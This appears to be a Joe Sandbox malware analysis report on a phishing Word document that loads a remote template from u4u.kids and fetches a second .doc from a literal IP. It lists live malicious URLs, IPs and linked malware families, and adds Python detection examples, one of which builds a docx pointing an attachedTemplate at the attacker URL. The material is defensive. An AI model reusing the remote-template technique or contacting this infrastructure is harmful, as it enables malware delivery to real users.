
Windows Analysis Report
PO NAHK22012FA000000.docx

Overview

General Information

Sample name: PO NAHK22012FA000000.docx
Analysis ID: 1540372
MD5: 48dd0e8d2647a5d093f64f186dcac877
SHA1: 258650076b605d2d46984016ad2986e7e41b6b9e
SHA256: e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Microsoft Office launches external ms-search protocol handler (WebDAV)
Contains an external reference to another file
Office viewer loads remote template
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3312 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
No yara matches
Sigma Overview

Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49164, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3312, Protocol: tcp, SourceIp: 24.199.88.84, SourceIsIpv6: false, SourcePort: 443
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3312, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
No Suricata rule has matched

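The Sigma hits above are raw Sysmon-style fields (EventID 3 network connection, EventID 13 registry value set, EventID 11 file create) for WINWORD.EXE PID 3312. The detection logic below is an added example, not Joe Sandbox code and not a reproduction of any published Sigma rule. It runs the checks a SOC would want over constructed events built from those fields, plus an assumed EventID 7 image load for davhlpr.dll that mirrors the report's "netapi32.dll and davhlpr.dll loaded" observation, and a constructed explorer.exe control event that must not alert. Note that the report prints the remote host (24.199.88.84:443) in SourceIp even though Initiated is true, so the code picks the non-local endpoint by address rather than by field name.

```python
"""Detection logic over the Sysmon-style events listed in this report.

Added example, not a Sigma rule and not Joe Sandbox code. Three events are
built from the fields printed in the report; the EventID 7 image load and
the explorer.exe event are constructed (assumptions) for illustration.
Field names follow Sysmon's schema.
"""
import ipaddress
from pathlib import PureWindowsPath

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}
WEBDAV_CLIENT_DLLS = {"davhlpr.dll", "davclnt.dll"}
WININET_SETTINGS_KEY = r"\Internet Settings\Connections\SavedLegacySettings"


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _remote_endpoint(event: dict):
    """Return (ip, port) for whichever side of the connection is not local.

    Sysmon normally puts the local host in SourceIp when Initiated is true,
    but this report renders the remote host in SourceIp for the same event,
    so both fields are checked instead of trusting the names.
    """
    for ip_key, port_key in (("DestinationIp", "DestinationPort"), ("SourceIp", "SourcePort")):
        ip = event.get(ip_key)
        if ip and ipaddress.ip_address(ip).is_global:
            return ip, int(event.get(port_key, 0))
    return None


def office_alerts(events: list[dict]) -> list[dict]:
    """Flag Office processes that reach the internet, load the WebDAV client
    DLLs, or write WinINet's saved connection settings."""
    alerts = []
    for ev in events:
        if _basename(ev.get("Image", "")) not in OFFICE_IMAGES:
            continue
        pid, eid = ev.get("ProcessId"), ev.get("EventID")
        if eid == 3 and ev.get("Initiated"):
            remote = _remote_endpoint(ev)
            if remote:
                alerts.append({"rule": "office_outbound_connection", "pid": pid,
                               "detail": f"{remote[0]}:{remote[1]}", "severity": "high"})
        elif eid == 7 and _basename(ev.get("ImageLoaded", "")) in WEBDAV_CLIENT_DLLS:
            alerts.append({"rule": "office_webdav_client", "pid": pid,
                           "detail": _basename(ev["ImageLoaded"]), "severity": "medium"})
        elif eid == 13 and ev.get("TargetObject", "").endswith(WININET_SETTINGS_KEY):
            # WinINet writes this value itself, so alone it only shows the
            # process used WinINet; it corroborates the network alert.
            alerts.append({"rule": "office_wininet_settings_write", "pid": pid,
                           "detail": "SavedLegacySettings", "severity": "info"})
    return alerts


WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"

# Constructed sample events; the first three copy the report's fields.
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": WINWORD, "ProcessId": 3312, "Initiated": True, "Protocol": "tcp",
     "SourceIp": "24.199.88.84", "SourcePort": 443,
     "DestinationIp": "192.168.2.22", "DestinationPort": 49164},
    {"EventID": 13, "Image": WINWORD, "ProcessId": 3312, "EventType": "SetValue",
     "TargetObject": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
                     r"\Internet Settings\Connections\SavedLegacySettings"},
    {"EventID": 11, "Image": WINWORD, "ProcessId": 3312,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm"},
    # Assumed: image-load event matching "davhlpr.dll loaded" (path is an assumption).
    {"EventID": 7, "Image": WINWORD, "ProcessId": 3312,
     "ImageLoaded": r"C:\Windows\System32\davhlpr.dll"},
    # Constructed control: a non-Office process must not alert.
    {"EventID": 3, "Image": r"C:\Windows\explorer.exe", "ProcessId": 1234, "Initiated": True,
     "SourceIp": "192.168.2.22", "SourcePort": 50000,
     "DestinationIp": "24.199.88.84", "DestinationPort": 443},
]

if __name__ == "__main__":
    for alert in office_alerts(SAMPLE_EVENTS):
        print(alert)
```

In production the outbound rule needs an allow-list for legitimate Office endpoints (update, licensing, cloud storage); the value of the EventID 7 check is that a WebDAV client load inside Word is rare enough to need no such list.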
Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: global traffic | DNS query: name: u4u.kids (7 identical entries)
Source: global traffic | TCP traffic: 192.168.2.22:49164 through 49169 <-> 24.199.88.84:443 (six connections, packets in both directions; 169 per-packet entries collapsed)
Source: global traffic | TCP traffic: 192.168.2.22:49170 <-> 62.151.179.85:80 (one connection, packets in both directions)
Source: Joe Sandbox View | ASN Name: TWC-12271-NYCUS TWC-12271-NYCUS
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected (request to u4u.kids):
    GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: u4u.kids
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (request to 62.151.179.85, a literal IP that was never resolved through DNS during the run):
    GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 62.151.179.85
    Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 62.151.179.85 (5 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmp
Source: global traffic | DNS traffic detected: DNS query: u4u.kids
Source: global traffic | HTTP traffic detected (two responses, one second apart, with identical headers apart from Date):
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 23 Oct 2024 15:50:13 GMT (second response: 15:50:14 GMT)
    Content-Type: text/html; charset=utf-8
    Content-Length: 144
    Connection: close
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Content-Security-Policy: default-src 'none'
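Both requests above carry the Office WinINet user agent (the "ms-office; MSOffice 14" tail) rather than a browser's, and the second one pulls a .doc from a host written as a literal IP. The following check is an added example, not Joe Sandbox code: it re-assembles the two requests from the report with CRLF line endings (the report prints them run together), parses them the way a proxy or IDS would, and returns the reasons each one is suspicious. A constructed Firefox request serves as a negative control. The first request was made over TLS, so a proxy only sees it if TLS inspection is in place; the sandbox shows it decrypted.

```python
"""HTTP-layer triage of Office-initiated fetches seen in this report.

Added example, not Joe Sandbox code. REQ_TEMPLATE and REQ_DOC are the two
requests printed in the report, re-joined with CRLF; REQ_BROWSER is a
constructed control. The parsing and the reasons are assumptions about how
a proxy log check would be written, not a reproduction of any vendor rule.
"""
import ipaddress
from urllib.parse import urlsplit

OFFICE_UA_MARKERS = ("ms-office", "MSOffice ")
DOC_EXTENSIONS = (".doc", ".dot", ".docm", ".dotm", ".rtf")

OFFICE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
             ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)")

REQ_TEMPLATE = "\r\n".join([
    "GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big"
    "&children=squealing&swiss=mammoth&disarmament HTTP/1.1",
    "Accept: */*", f"User-Agent: {OFFICE_UA}", "UA-CPU: AMD64",
    "Accept-Encoding: gzip, deflate", "Host: u4u.kids", "Connection: Keep-Alive", "", "",
])
REQ_DOC = "\r\n".join([
    "GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodperson"
    "withgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc"
    " HTTP/1.1",
    "Accept: */*", f"User-Agent: {OFFICE_UA}", "UA-CPU: AMD64",
    "Accept-Encoding: gzip, deflate", "Host: 62.151.179.85", "Connection: Keep-Alive", "", "",
])
# Constructed control request from an ordinary browser.
REQ_BROWSER = "\r\n".join([
    "GET / HTTP/1.1", "Host: example.invalid",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0",
    "", "",
])


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, version and headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def _is_literal_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def classify_request(raw: str) -> list[str]:
    """Return the reasons a request looks like an Office document fetch.

    An empty list means nothing in this check fired."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    reasons = []
    if any(marker in ua for marker in OFFICE_UA_MARKERS):
        reasons.append("office-user-agent")
        if _is_literal_ip(host):
            reasons.append("host-is-literal-ip")
        if urlsplit(req["target"]).path.lower().endswith(DOC_EXTENSIONS):
            reasons.append("fetches-document")
    return reasons


if __name__ == "__main__":
    for name, raw in (("template", REQ_TEMPLATE), ("doc", REQ_DOC), ("browser", REQ_BROWSER)):
        print(name, classify_request(raw))
```

The "office-user-agent" reason alone is noisy on networks where Office legitimately fetches templates or SharePoint content; the combination with a literal-IP host or a document download is what makes the second request worth a ticket.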
Source: unknown | Network traffic detected: HTTP traffic on ports 49164 through 49169 <-> 443 (12 entries collapsed)
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine | Classification label: mal56.evad.winDOCX@1/16@7/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$ NAHK22012FA000000.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR894B.tmp
Source: PO NAHK22012FA000000.docx | OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr | OLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docx | OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: PO NAHK22012FA000000.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA000000.docx
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: PO NAHK22012FA000000.docx | Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: PO NAHK22012FA000000.docx | Initial sample: OLE zip file path = word/media/image3.emf
Source: PO NAHK22012FA000000.docx | Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: PO NAHK22012FA000000.docx | Initial sample: OLE zip file path = word/media/image2.emf
Source: PO NAHK22012FA000000.docx | Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/media/image2.emf
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/media/image3.emf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: PO NAHK22012FA000000.docx | Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRoot
Source: settings.xml.rels | Extracted files from sample: https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Section loaded: netapi32.dll and davhlpr.dll loaded
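The remote template URL above was recovered from word/_rels/settings.xml.rels, one of the zip paths the static pass listed, and the document also carries word/embeddings/oleObject2.bin while reporting no VBA macros. That combination (no macros, an external attachedTemplate relationship, an embedded OLE object) is what a static triage step should surface before any detonation. The script below is an added example, not Joe Sandbox code: it builds a constructed, minimal .docx in memory whose settings.xml.rels points an attachedTemplate relationship at the URL from this report, then walks every *.rels part in the package and reports each relationship whose target leaves the package, together with any files under word/embeddings/. The surrounding XML, the hyperlink relationship used as a contrast, and the placeholder oleObject2.bin bytes are assumptions; only the URL and the part names come from the report.

```python
"""Static triage of an OOXML document for external relationship targets.

Added example for this report, not Joe Sandbox code. The sample package is
constructed: it is the minimum this parser needs, not a file Word would
open. The attachedTemplate URL is the one the report extracted; everything
else in the package is an assumption made to show what is and is not flagged.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Relationship types Word follows on its own when the file is opened.
AUTO_LOAD_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument"}
# Targets that leave the package: URLs, UNC paths, protocol handlers.
LEAVES_PACKAGE = re.compile(r"^(https?://|file://|\\\\|ms-[a-z-]+:|mhtml:)", re.I)


def external_relationships(docx_bytes: bytes) -> list[dict]:
    """Return every relationship, in any *.rels part, whose target is outside the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel.get("TargetMode") == "External" or LEAVES_PACKAGE.match(target):
                    findings.append({"part": name, "id": rel.get("Id"), "type": rel_type,
                                     "target": target, "auto_load": rel_type in AUTO_LOAD_TYPES})
    return findings


def embedded_objects(docx_bytes: bytes) -> list[str]:
    """List embedded OLE/package parts, which the report shows even without macros."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        return sorted(n for n in zf.namelist() if n.startswith("word/embeddings/"))


def verdict(findings: list[dict]) -> str:
    if any(f["auto_load"] for f in findings):
        return "remote-template-or-object"
    return "external-links-only" if findings else "no-external-targets"


def build_sample_docx() -> bytes:
    """Constructed sample: settings.xml with an attachedTemplate pointing at the report's URL."""
    template_url = ("https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting"
                    "&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament")
    settings_rels = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/attachedTemplate" '
        f'Target={quoteattr(template_url)} TargetMode="External"/></Relationships>'
    )
    document_rels = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/settings" Target="settings.xml"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}/hyperlink" '
        f'Target="https://example.invalid/" TargetMode="External"/></Relationships>'
    )
    settings_xml = (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{OFFICE_REL}">'
                    f'<w:attachedTemplate r:id="rId1"/></w:settings>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        zf.writestr("word/settings.xml", settings_xml)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/embeddings/oleObject2.bin", b"\xd0\xcf\x11\xe0placeholder")  # assumed bytes
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    for f in external_relationships(sample):
        print(f)
    print(embedded_objects(sample), verdict(external_relationships(sample)))
```

Run against a real file by replacing build_sample_docx() with the bytes read from disk. The ET parser is enough here, but XML from untrusted documents should be fed through a hardened parser (defusedxml or equivalent) in a production pipeline; a hyperlink target is listed but not marked auto_load because Word only follows it on a click.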
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (67 identical entries collapsed)
Source: PO NAHK22012FA000000.docx | Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRD0000.tmp.0.dr | Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr | Stream path '_1791189376/CONTENTS' entropy: 7.98640213683 (max. 8.0)
MITRE ATT&CK Matrix (one entry per tactic; a leading number is the report's count of matched signatures for that technique):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: 3 Exploitation for Client Execution; Scheduled Task/Job; At; Cron
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
Defense Evasion: 1 Masquerading; 1 Obfuscated Files or Information; Obfuscated Files or Information; Binary Padding
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: 1 File and Directory Discovery; 2 System Information Discovery; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: 1 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; 4 Ingress Tool Transfer
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Antivirus detection (Source | Detection | Scanner):
PO NAHK22012FA000000.docx | 8% | ReversingLabs
No Antivirus matches (reported for each of the remaining four scan categories)
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
u4u.kids | 24.199.88.84 | true | true | - | unknown
URLs (Name | Malicious | Antivirus Detection | Reputation):
https://u4u.kids/rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament | false | - | unknown
http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc | false | - | unknown
IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
62.151.179.85 | unknown | Spain | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
24.199.88.84 | u4u.kids | United States | 12271 | TWC-12271-NYCUS | true
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1540372
        Start date and time:2024-10-23 17:49:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 43s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:9
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PO NAHK22012FA000000.docx
        Detection:MAL
        Classification:mal56.evad.winDOCX@1/16@7/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: PO NAHK22012FA000000.docx
        No simulations
Context matches for IPs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
62.151.179.85 | derstand.doc | malicious | Unknown | 62.151.179.85/401/nj/feelnicewithgreatthingsgreatdayscomingforgreat.hta
62.151.179.85 | feelnicewithgreatthingsgreatdayscomingforgreat.hta | malicious | Cobalt Strike | 62.151.179.85/401/getbackwithbestthingsforeithergoodthings.tIF
24.199.88.84 | PO NAHK22012FA00000.docx.doc | malicious | Remcos | -
24.199.88.84 | Logs.xls | malicious | Lokibot | -
24.199.88.84 | Inv No.248740.xls | malicious | Unknown | -
24.199.88.84 | InvoiceXCopy.xls | malicious | Snake Keylogger | -
Context matches for domains (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
u4u.kids | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 24.199.88.84
u4u.kids | Logs.xls | malicious | Lokibot | 24.199.88.84
u4u.kids | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
u4u.kids | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
Context matches for ASNs (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
TWC-12271-NYCUS | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 24.199.88.84
TWC-12271-NYCUS | Logs.xls | malicious | Lokibot | 24.199.88.84
TWC-12271-NYCUS | Inv No.248740.xls | malicious | Unknown | 24.199.88.84
TWC-12271-NYCUS | byte.mpsl.elf | malicious | Okiru | 68.174.131.114
TWC-12271-NYCUS | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
TWC-12271-NYCUS | l6G93s9XLN.elf | malicious | Mirai | 68.173.141.203
TWC-12271-NYCUS | la.bot.arm5.elf | malicious | Unknown | 66.108.151.148
TWC-12271-NYCUS | la.bot.sh4.elf | malicious | Unknown | 72.231.14.8
TWC-12271-NYCUS | yakuza.m68k.elf | malicious | Unknown | 74.72.188.143
TWC-12271-NYCUS | la.bot.sparc.elf | malicious | Unknown | 24.90.54.210
ONEANDONE-ASBrauerstrasse48DE | LlbpXphTu9.exe | malicious | Unknown | 217.160.0.132
ONEANDONE-ASBrauerstrasse48DE | derstand.doc | malicious | Unknown | 62.151.179.85
ONEANDONE-ASBrauerstrasse48DE | feelnicewithgreatthingsgreatdayscomingforgreat.hta | malicious | Cobalt Strike | 62.151.179.85
ONEANDONE-ASBrauerstrasse48DE | la.bot.mips.elf | malicious | Unknown | 212.227.7.107
ONEANDONE-ASBrauerstrasse48DE | Sprawl.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.102
ONEANDONE-ASBrauerstrasse48DE | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | 213.165.67.118
ONEANDONE-ASBrauerstrasse48DE | Invoice.exe | malicious | FormBook, PureLog Stealer | 217.160.0.158
ONEANDONE-ASBrauerstrasse48DE | la.bot.powerpc.elf | malicious | Mirai | 212.227.7.42
ONEANDONE-ASBrauerstrasse48DE | Request for 30 Downpayment.exe | malicious | FormBook, PureLog Stealer | 217.160.0.93
ONEANDONE-ASBrauerstrasse48DE | la.bot.arm.elf | malicious | Unknown | 212.227.138.124
Context matches for fingerprints (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
05af1f5ca1b87cc9cc9b25185115607d | PO NAHK22012FA00000.docx.doc | malicious | Remcos | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | Logs.xls | malicious | Lokibot | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | InvoiceXCopy.xls | malicious | Snake Keylogger | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger | 24.199.88.84
05af1f5ca1b87cc9cc9b25185115607d | oodforme.doc | malicious | Remcos | 24.199.88.84
